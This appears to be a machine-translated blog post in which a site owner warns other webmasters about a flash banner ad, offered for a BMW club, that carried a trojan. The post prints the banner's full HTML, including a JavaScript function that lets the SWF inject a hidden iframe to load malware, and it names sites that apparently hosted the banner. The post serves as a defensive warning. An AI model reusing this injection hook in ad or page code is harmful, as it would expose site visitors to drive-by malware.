12:14 Distribution of trojans via flash banners | |
| Note: Be careful when placing the flash banners! Background. I own a fairly popular resource. Some time ago there were few complaints with the request to place "not bringing any harm iframe». Of these proposals has been abandoned, because karma is more important.) Yesterday a man asked, with a proposal to place a small flash banner, c advertising BMW Club. The code was having a bad Trojan "bonus". UPD!: Write in support of the Yandex. Reply. Thanked and informed that the code is sent for analysis to the appropriate department. mini victory?) rest of UPDs under the cut Here is the code completely: <! - BANER CODE -> <div align = " center "> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="100" height="100" id="FlashID" title="flash"> <param name="movie" value="/bmw.swf" /> <param name="quality" value="high" /> <param name = "wmode" value = "opaque" /> <param name="swfversion" value="9.0.45.0" /> <object type = "application / x-shockwave-flash "data =" / bmw.swf "width =" 100 "height =" 100 "> <param name="quality" value="high" /> < ; param name = "wmode" value = "opaque" /> <param name="swfversion" value="9.0.45.0" /> <param name = "expressinstall" value = "scripts / expressInstall.swf" /> <h4> Content on this page requires a newer version of Adobe Flash Player. </ h4> <p> <a href="http://www.adobe.com/go/getflashplayer"> <img src = "http://www.adobe .com / images / shared / download_buttons / get_flash_player.gif "alt =" Get Adobe Flash player "width =" 100 "height =" 100 "/> </ a> </ p> < / object> </ object> </ div> <div> <div align = "center" id = "res"> All about the BMW </ div> </ div> <xscript type="text/javascript"> function banner (str ) {document.getElementById ('res'). innerHTML = str; return (str)}; </ script> <! - / BANER CODE -> * This source code was highlighted with Source Code Highlighter. Pay attention to the bottom of the package, or more precisely the function banner, is it and caused suspicion. Just not right away it was clear who should call this function. It turned out he flash banner to call this function and created the page a hidden iframe, through which the user intended to load a Trojan. Here is a story. Be careful! On request I can provide contacts "hero" who offered to place a similar banner. UPD: ask experts to give advice where you can drop the distribution of Trojans? UPD2: give the address advertised of the BMW club. www.bmwclub.ua/. We go to his stats li.ru and watch the traffic sources (http://www.liveinternet.ru/stat/bmw.kiev.ua/sources.html). We find, for example, the site www.tosti.ru/ (attendance over 100k) and see it placed on a banner with flash trojan. Administration toast I accomplish your goal, if there is anyone the opportunity to pitch comb and the administration of other portals (if the volunteer is not there, make yourself at night). PS: According to troyanorasprostranitelya he is no relation to the BMW club has not. quote: "Our agency intermediary between the platform and the advertiser." _________ The text was drafted in HabraRedaktore | |
|
| |
| Total comments: 0 | |